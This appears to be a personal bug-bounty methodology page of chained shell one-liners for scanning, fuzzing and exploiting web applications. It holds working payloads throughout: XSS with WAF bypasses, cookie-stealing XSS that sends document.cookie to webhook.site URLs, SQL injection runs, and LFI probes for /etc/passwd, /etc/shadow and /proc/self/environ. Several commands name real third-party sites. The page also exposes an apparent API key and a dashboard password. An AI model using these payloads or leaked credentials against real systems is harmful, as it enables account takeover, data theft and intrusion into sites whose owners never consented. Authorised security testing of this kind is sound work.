My Concept

Find Broken Access Control

Numbers of Web Assets in scope.
Filter with httpx.
After filtering, select an unauthenticated web application.
Fuzzing Directories with FFUF.
Most of the results 302 Redirect.
Run FFUF again with size filter.
Few Results came.
One of the result 302 Redirect -> /directory, when open it leads to /directory/v1/endpoint.svc
Use the Wsdler Burp extension to enumerate the endpoints.
Multiple endpoints execute successfully without authorization.

✅ Use the -fs filter in FFUF to exclude responses with the same size, making it easier to spot unique and interesting findings.

Find and Exploit CVE :

https://cloud.projectdiscovery.io/library?limit=10&page=0&search=miniocloud.projectdiscovery.io

💀 Sploitus | Exploits & Tools Search EngineSploitus_com

Search CVE

vulnx search drupal
vulnx search "Drupal 11.1.3"
vulnx search "Drupal 11.1.3" --detailed

Search CVE Detail

vulnx id CVE-2023-28432

Search CVE Template

https://cloud.projectdiscovery.io/library/CVE-2024-12356

Find XSS

Nuclei

cat endpoints.txt | uro | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

xoxo Method

cat xss-ready.txt | uro | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

httpx + Gxss + Kxss = Coffin Method

cat endpoints.txt | grep '=' | uro | httpx-toolkit -ct -silent -nc | grep -i -E "text/html|application/xhtml+xml|application/xml|text/xml|image/svg+xml|application/html|application/xml" | cut -d '[' -f 1 | Gxss | kxss

Friend Method

cat livesubdomains.txt | waybackurls | anew wayback.txt && katana -u livesubdomains.txt -jc 3 -d 5 -o katana.txt && cat livesubdomains.txt | gau | anew gau.txt && urlfinder -list livesubdomains.txt -o urlfinder.txt && cat wayback.txt katana.txt gau.txt urlfinder.txt | sort -u | anew allurls.txt && cat allurls.txt | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt|eot|ttf)" | anew filter_urls_1.txt && cat filter_urls_1.txt | grep -e "=" | anew param_1.txt && p1radup -i param_1.txt -o param_2.txt && cat param_2.txt | httpx | anew live_parameters.txt && cat live_parameters.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

Bruteforce Method - Find Hidden Endpoints and the Prameters

cat livesubdomains.txt | httpx -title -sc -td -server -location | grep  PHP  && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep -i ASP && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep Java && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep CFML  && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep  Perl

Extracts links and Paths

curl -s https://www.pcmmod.com/js/utils/web_calls.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

Find Hidden endpoints in JS Files for Bruteforce Prameters

cat endpoints.txt | grep "js$" | tee jsfiles.txt && cat jsfiles.txt | jsecret && cat jsfiles.txt | httpx -mc 200 | python3 /home/kali/tools/JSA/jsa.py

Find Hidden endpoints in robots.txt for Bruteforce Prameters

httpx-toolkit -l livesubdomains.txt -path /robots.txt -silent -o robots-url.txt && for url in $(cat robots-url.txt); do base=$(echo "$url" | sed 's/\/robots\.txt$//'); curl -s "$url" | grep -i 'Disallow' | awk '{print $2}' | sed 's#^/##' | while read path; do echo "$base/$path" | sed 's#//#/#g' | anew robot-words.txt; done; done

FUZZ Restricted Domains

cat livesubdomains.txt | httpx -mc 403 -title -sc -td -server -location && cat livesubdomains.txt | httpx -mc 401 -title -sc -td -server -location

Arjun

grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' endpoints.txt | sort -u  | httpx -mc 200 -silent  | tee fuzz.txt && echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..." && arjun -i fuzz.txt -oT arjun_result_ext_endpoints.txt && awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' arjun_result_ext_endpoints.txt | tee "$output_dir/arjun-xss.txt" && nuclei -l "$output_dir/arjun-xss.txt" -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single && echo -e "${PURPLE}Filtering Ext-Endpoint for Find Hidden Parameters with Arjun..." && grep -Ei "\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action)$" endpoints.txt | tee arjun-raw-endpoints.txt && echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with Arjun..." && uro < arjun-raw-endpoints.txt | httpx -mc 200 | tee arjun_ext-endpoints.txt && echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..." && arjun -i arjun_ext-endpoints.txt -oT arjun_result_ext_endpoints.txt && awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' arjun_result_ext_endpoints.txt | tee "$output_dir/arjun-xss.txt" && nuclei -l "$output_dir/arjun-xss.txt" -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

echo -e "${PURPLE}Filtering Ext-Endpoint for Hidden Parameters with x8..." && grep -Ei "\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action)$" endpoints.txt | tee x8-raw-endpoints.txt && echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with x8..." && cat x8-raw-endpoints.txt | uro | httpx -mc 200 -silent | tee x8_ext-endpoints.txt && echo -e "Running x8 to find Ext-Endpoints for Hidden Parameters..." && x8 -u x8_ext-endpoints.txt -w /parameters.txt -X GET -o x8.txt && cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee x8-xss.txt && cat x8-xss.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

site:.who.int inurl:? | inurl:&

Exploit & Bypass XSS

GET Method - URL with 1 parameter

curl https://api.knoxss.pro -d 'target=https://videohub.sbb.ch/esearch/search?keyword=asad' -H 'X-API-KEY: 12a4f604-0410-47ad-aeef-fa537a206bb1'

GET Method - URL with 2+ parameters => %26 between Parameters

curl https://api.knoxss.pro -d 'target=http://www.unesco.org/archives/multimedia/index.php?page=2%26pg=34%26pattern%26video=video' -H 'X-API-KEY: 12a4f604-0410-47ad-aeef-fa537a206bb1'

Authenticated GET Method - with Cookies

curl https://api.knoxss.pro -d 'target=https://x55.is/brutelogic/session/index.php?name=guest&auth=Cookie:PHPSESSID=9p77u90dssmkmn3kgmmgq3b5d3' -H 'X-API-KEY: 12a4f604-0410-47ad-aeef-fa537a206bb1'

Find Open Redirect

webhook

cat endpoints.txt | grep '='  | qsreplace https://webhook.site/de8aa6b8-5a22-43f2-b38c-0aa12e7f722a > ssrf.txt && cat ssrf.txt | httpx -fr && split -l 10 ssrf.txt output_file_prefix

Nuclei

cat endpoints.txt | nuclei -dast -t /home/kali/nucli/open-redirect.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

Generic

cat livesubdomains.txt | nuclei -t /home/kali/nucli/swagger/open-redirect-generic.yaml

Google Dork

site:.*.com inurl:"=https" 
site:*.pk inurl:"redirectURL="

Find Secrets and Endpoints in JS files

cat endpoints.txt | grep -E "\.js$" | urldedupe | httpx -silent | tee js_files.txt

cat js_files.txt | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

cat js_files.txt | nuclei -t exposures/ --s info,high,critical,medium -es unknown -c 30

Extract Endpoints and Secrests

cat livesubdomains.txt | while read host; do for path in /config.js /.aws/credentials /admin/config.json /config.json /app/config.json /app/config.js /settings.json /database.json /firebase.json /.env /.env.production /api_keys.json /credentials.json /secrets.json /google-services.json /package.json /package-lock.json /composer.json /pom.xml /docker-compose.yml; do echo "$host$path"; done; done | httpx -mc 200 -sc -cl -title

cat katana.txt | grep "js$" | tee jsfiles.txt && cat jsfiles.txt | jsecret && cat jsfiles.txt | httpx -mc 200 | python3 /home/kali/tools/JSA/jsa.py

Misconfiguration checks

nuclei -tags misconfig -l katana.txt -rl 75 -es low,info -ss host-spray -H "Cookie: auth=123" -H "User-Agent: ..."

Chek Improper Access Controll

while IFS= read -r host; do
  feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -W 0 \
    -x js,php,html,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl \ 
    -w /raft-small-directories.txt -u "$host/"  -t 10 --rate-limit 1000  --time-limit 1m 
done < livesubdomains.txt

while IFS= read -r host; do
  host="${host%%[[:space:]]*}"         # trim trailing whitespace
  host="${host%/}"                     # remove trailing slash if present
  host=$(printf '%s' "$host" | tr -d '\r')  # remove stray CR
  [ -z "$host" ] && continue
  feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -W 0 \
    -x js,php,html,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl \
    -w /home/kali/common.txt -u "$host" -t 10 --rate-limit 1000 --time-limit 1m
done < livesubdomains.txt

Extract URLs from Text - Extract HTML Links - Online - Browserling Web Developer Toolswww.browserling.com

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://api.hoteltonight-test.com/FUZZ -mc 200 -H "Content-Type: application/json"

dirsearch -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://xyz.example.com -e js,svc,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pml,pl --full-url --max-rate=5 -i 200

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,phtml,inc,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pml,pl -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50

ffuf -u https://www.kfc.co.uk/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -recursion -recursion-depth 4 -mc 200 -e .js,.svc,.php,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx,.cfm,.jsp,.jspx,.jsf,.jspa,.do,.pml,.action,.act,.pl -rate 50 -t 50200

3:ThenFind vulnerable Endpointsof Both Domain according to tech and endpoint-extention: with Fuzzing used ffuf like error.php, demo.html, test.htm

Run Fuzzing with feroxbuster
Extract Domains

grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' endpoints.txt | sort -u  | httpx -mc 200 | tee fuzz.txt && echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..." && arjun -i fuzz.txt -oT arjun_result_ext_endpoints.txt && awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' arjun_result_ext_endpoints.txt | tee "$output_dir/arjun-xss.txt" && nuclei -l "$output_dir/arjun-xss.txt" -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

grep -Eio 'https?://[^/]+/[^/]+\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action|pml)$' katana.txt | sort -u | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sort -u | httpx -mc 200 | tee fuzz.txt

cat livesubdomains.txt | httpx -title -sc -td -server -location | grep  PHP  && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep -i ASP && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep Java && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep CFML  && cat livesubdomains.txt | httpx -title -sc -td -server -location | grep  Perl

PHP

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,phtml,inc,html,xhtm,htm,htn -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50

ASP.NET

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,html,xhtm,htm,htn,asp,aspx,ashx,asmx -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50

JAVA

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,svc,php,html,xhtm,htm,htn,jsp,jspx,jsf,jspa,do,action,act,pml -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 50

4:Then find the vulnerable Parameterswith Arjun or x8like error.php?code=xss

Run Arjun On All Endpoints

arjun -i endpoints.txt -oT arjun.txt && cat arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee -a check.txt

Run x8 On All Endpoints with Assetnote parameters wordlist

x8 -u endpoints.txt -w /parameters.txt -X GET -o x8.txt && cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee -a check.txt

5:Quick confirm Vuln urls

cat check.txt | xargs -I % -P 25 sh -c 'x="%"; xu=$(echo "$x" | qsreplace "REFLECTED"); lu=$(echo "$x" | qsreplace "/etc/passwd"); curl -s "$xu" | grep -q "REFLECTED" && echo -e "\033[1;32m[+] XSS Possible\033[0m: $xu"; curl -s "$lu" | grep -q "root:x" && echo -e "\033[1;31m[+] LFI Possible\033[0m: $lu"'

cat check.txt | while read -r u; do f=$(curl -sL -o /dev/null -w "%{url_effective}" "$(echo "$u" | qsreplace 'https://evil.com')"); if [[ "$f" == "https://evil.com"* ]]; then echo -e "Original: $u\nFinal: \033[1;31m$f\033[0m\nStatus: \033[1;32mVULNERABLE\033[0m\n"; else echo -e "Original: $u\nFinal: $f\nStatus: \033[1;33mNOT VULNERABLE\033[0m\n"; fi; done

6:Then confirm html injection

cat check.txt | Gxss -p '">asad<hacked' && cat check.txt | Gxss | httpx -sc && cat check.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee confirm-html-injection.txt

7:Then confirm Reflected XSS

cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/xss/reflected-xss.yaml -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

cat check.txt | Gxss -p '">asad<hacked' | tee -a confirm-xss.txt && cat confirm-xss.txt | qsreplace '"><Img Src=OnXSS OnError=(alert)(origin)>'

➡️ RXSS CloudFlare
\">K='><Svg/OnLoad=(confirm)(origin)>
'"/><Img Src=OnXSS OnError=(alert)(1)>
'"/><SVG/oNlY=1 ONlOAD=confirm(document.domain)>

➡️ DOM CloudFlare
'-alert?.(1)-' 
')[alert][0].call(this,document["cookie"])//
javascript://target.com/%E2%80%A8alert(1)
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin)

➡️ CMD CloudFlare
cat /e${hahaha}tc/${heywaf}pas${catchthis}swd

➡️ Imperva
'"><Image Src=//X55.is OnLoad%0C=import(Src)//

➡️ Akamai
'"><A Href AutoFocus %252F="/"OnFocus=k='t',top['aler'%2Bk](1)>

8:Find XSS Vulnerable Endpoint in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

ffuf -u "FUZZ/asad/..CFIDE/administrator/index.cfm" -w livesubdomains.txt -c -v

9:Reflected XSS toAccount Take Over

https://xss.report/dashboard swagpk Synack@3434
https://bxsshunter.com/dashboard Synack@3434

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

10:Then confirmSQL injection

cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/sqli/ -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1"

while read url; do
    echo "Testing URL: $url"
    yes n | ghauri -u "$url" --dbs --batch --banner --current-db --level 3
done < check.txt


while read url; do
    echo "Testing URL: $url"
    yes n | sqlmap -u "$url" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment
done < check.txt

Manual Confirm

'||1==1--+-
"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

cat check.txt | gf sqli > check-sql.txt; sqlmap -m check-sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a confirm-sqli.txt

ghauri -u https://ugadmissions.neduet.edu.pk/admissions/user_login.jsp?id=1 --random-agent -v3 --level=3 risk=3

11:Then confirmOpen Redirect

cat check.txt | qsreplace 'https://%09/evil.com' | httpx -status-code -title -location -fr -mr "evil.com"

cat check.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -location -fr -mr "evil.com"

cat check.txt | qsreplace "///evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

Check with wordlist

cat check.txt | sed 's/=.*/=/' | httpx-toolkit -paths op.txt -threads 50 -random-agent -sc -location

12:Then confirm Local file inclusion (LFI)

cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/lfi/ -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm single

cat check.txt | sed 's/=.*/=/' | xargs -P 20 -I {} sh -c 'echo {} | httpx-toolkit -paths /lfi.txt -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:" -silent | head -n 1' > lfi_hits.txt && while read -r url; do echo -n "$url ... "; if curl -s -k --max-time 10 "$url" | grep -q "root:[x*$][^:]*:0:0:"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$url" >> confirmed_lfi.txt; else echo -e "\033[1;31mFAILED\033[0m"; fi; done < lfi_hits.txt

Check All Paths

while read -r url; do for path in "/etc/passwd" "/etc/shadow" "/etc/shells" "/etc/group" "/etc/profile" "/etc/hosts" "/proc/self/environ" "/proc/self/status" "/proc/mounts" "/proc/version" "/bin/sh"; do modified_url="${url/\/etc\/passwd/$path}"; echo -n "$modified_url ... "; response=$(curl -s -k --max-time 10 "$modified_url"); if [[ "$path" == "/etc/passwd" ]] && echo "$response" | grep -q "root:[x*$][^:]*:0:0:"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif [[ "$path" == "/etc/shadow" ]] && echo "$response" | grep -q "root:\$[0-9]\$[a-zA-Z0-9]"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif [[ "$path" == "/proc/self/environ" ]] && echo "$response" | grep -q "USER=\|PATH="; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif echo "$response" | grep -q "Permission denied\|No such file\|Forbidden\|Error"; then echo -e "\033[1;33mBLOCKED\033[0m"; else echo -e "\033[1;31mSAFE\033[0m"; fi; done; done < lfi_hits.txt

echo "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"
echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /lfi.txt -c -mr "root:(x|\*|\$[^\:]*):0:0:" -v; done
echo "https://admission.lumhs.edu.pk/web/home/tv.php?filesrc=2" | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

ADCE626 Bug Bounty Toolkitadce626.vercel.app

PreviousMatch & replace Rules NextDorking

Last updated 1 hour ago